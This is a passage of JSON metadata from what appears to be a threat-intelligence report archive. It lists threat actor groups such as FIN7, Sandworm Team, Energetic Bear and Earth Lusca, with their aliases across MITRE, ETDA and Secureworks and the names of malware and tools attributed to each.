"ATK32", "G0046", "G0008", "Sangria Tempest", "ELBRUS", "GOLD NIAGARA", "Coreid", "Carbanak", "Carbon Spider", "JokerStash", "CARBON SPIDER" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "bfded1cf-be73-44f9-a391-0751c9996f9a", "created_at": "2022-10-25T15:50:23.337107Z", "updated_at": "2026-04-10T02:00:05.252413Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "FIN7", "GOLD NIAGARA", "ITG14", "Carbon Spider", "ELBRUS", "Sangria Tempest" ], "source_name": "MITRE:FIN7", "tools": [ "Mimikatz", "AdFind", "JSS Loader", "HALFBAKED", "REvil", "PowerSploit", "CrackMapExec", "Carbanak", "Pillowmint", "Cobalt Strike", "POWERSOURCE", "RDFSNIFFER", "SQLRat", "Lizar", "TEXTMATE", "BOOSTWRITE" ], "source_id": "MITRE", "reports": null }, { "id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82", "created_at": "2022-10-25T16:07:23.619566Z", "updated_at": "2026-04-10T02:00:04.690061Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "APT-C-11", "ATK 32", "G0046", "Gold Niagara", "GrayAlpha", "ITG14", "TAG-CR1" ], "source_name": "ETDA:FIN7", "tools": [ "7Logger", "Agentemis", "Anubis Backdoor", "Anunak", "Astra", "BIOLOAD", "BIRDWATCH", "Bateleur", "Boostwrite", "CROWVIEW", "Carbanak", "Cobalt Strike", "CobaltStrike", "DICELOADER", "DNSMessenger", "FOWLGAZE", "HALFBAKED", "JSSLoader", "KillACK", "LOADOUT", "Lizar", "Meterpreter", "Mimikatz", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "POWERPLANT", "POWERSOURCE", "RDFSNIFFER", "Ragnar Loader", "SQLRAT", "Sardonic", "Sekur", "Sekur RAT", "TEXTMATE", "Tirion", "VB Flash", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434025, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/19c3e75214a9de6ed66964ca8dd50d0f823345cc.pdf", "text": "https://archive.orkl.eu/19c3e75214a9de6ed66964ca8dd50d0f823345cc.txt", "img": "https://archive.orkl.eu/19c3e75214a9de6ed66964ca8dd50d0f823345cc.jpg" } }